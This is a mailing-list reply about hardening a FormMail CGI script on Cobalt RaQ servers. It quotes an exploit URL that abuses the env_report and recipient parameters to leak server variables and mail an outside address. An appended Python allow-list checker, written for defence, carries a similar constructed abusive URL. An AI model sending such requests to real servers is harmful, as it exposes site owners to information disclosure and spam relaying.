
Re: [cobalt-users] CGI email



Dan Kriwitsky wrote:

> Checking what out? The exploit they published works.
> Exploit:
> http://www.example.com/cgi-bin/formmail.cgi?env_report=PATH&recipient=cache@
> dowebs.com&required=&firstname=&lastname=&email=&message=&Submit=<message>
> 

Exactly my point. It's a feature that does indeed work. It's also a
feature that can be turned off in at least 3 places in the script.

Comparison. A RaQ comes with telnet installed as a feature but we all
know how insecure that is. To get secure we install SSH and turn telnet
off, we don't throw the RaQ away. In short, we don't use the thing fresh
out of the box and expect it to be as secure as we might like. There are
posts galore on this list about how to turn off one feature or another
to harden a RaQ. All I'm saying is that no one should expect to use any
canned script, or any canned server, without some tinkering. 

I just hate to see someone being told he has to install something else
and tell his clients that they have to redo all those forms that they
probably didn't understand the first time, when patching what he has
will take only a few minutes.

keith
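As an added example (not code from FormMail or from anyone in this thread), here is the kind of check keith is arguing for: the recipient and env_report parameters are compared against allow-lists before anything is mailed, so a request that names an outside address or asks for an arbitrary environment variable is refused. The allow-list contents and the two sample URLs are assumptions constructed for this example.

```python
from urllib.parse import urlsplit, parse_qs

# Allow-lists are assumptions for this example, not values from any real
# FormMail install: only these recipients and CGI variables are permitted.
ALLOWED_RECIPIENTS = {"webmaster@example.com", "sales@example.com"}
ALLOWED_ENV = {"REMOTE_HOST", "REMOTE_ADDR", "HTTP_USER_AGENT"}


def check_request(url):
    """Return (ok, reasons) for a FormMail-style request URL.

    Rejects every recipient not on the allow-list and every env_report
    entry that is not one of the explicitly permitted CGI variables.
    """
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    reasons = []
    for value in qs.get("recipient", []):
        # FormMail accepts comma-separated recipients; check each address.
        for addr in value.split(","):
            addr = addr.strip().lower()
            if addr not in ALLOWED_RECIPIENTS:
                reasons.append(f"recipient not allowed: {addr}")
    for value in qs.get("env_report", []):
        for var in value.split(","):
            var = var.strip()
            if var not in ALLOWED_ENV:
                reasons.append(f"env_report variable not allowed: {var}")
    return (not reasons, reasons)


# Constructed samples: one request shaped like the abuse quoted in the
# thread (outside recipient, arbitrary env_report), one legitimate request.
ABUSIVE = ("http://www.example.com/cgi-bin/formmail.cgi?env_report=PATH"
           "&recipient=outsider@example.net&required=&firstname=&lastname="
           "&email=&message=&Submit=x")
LEGIT = ("http://www.example.com/cgi-bin/formmail.cgi?env_report=REMOTE_ADDR"
         "&recipient=webmaster@example.com&message=hello")

if __name__ == "__main__":
    for name, url in (("abusive", ABUSIVE), ("legit", LEGIT)):
        ok, reasons = check_request(url)
        print(name, "accepted" if ok else "rejected", reasons)
```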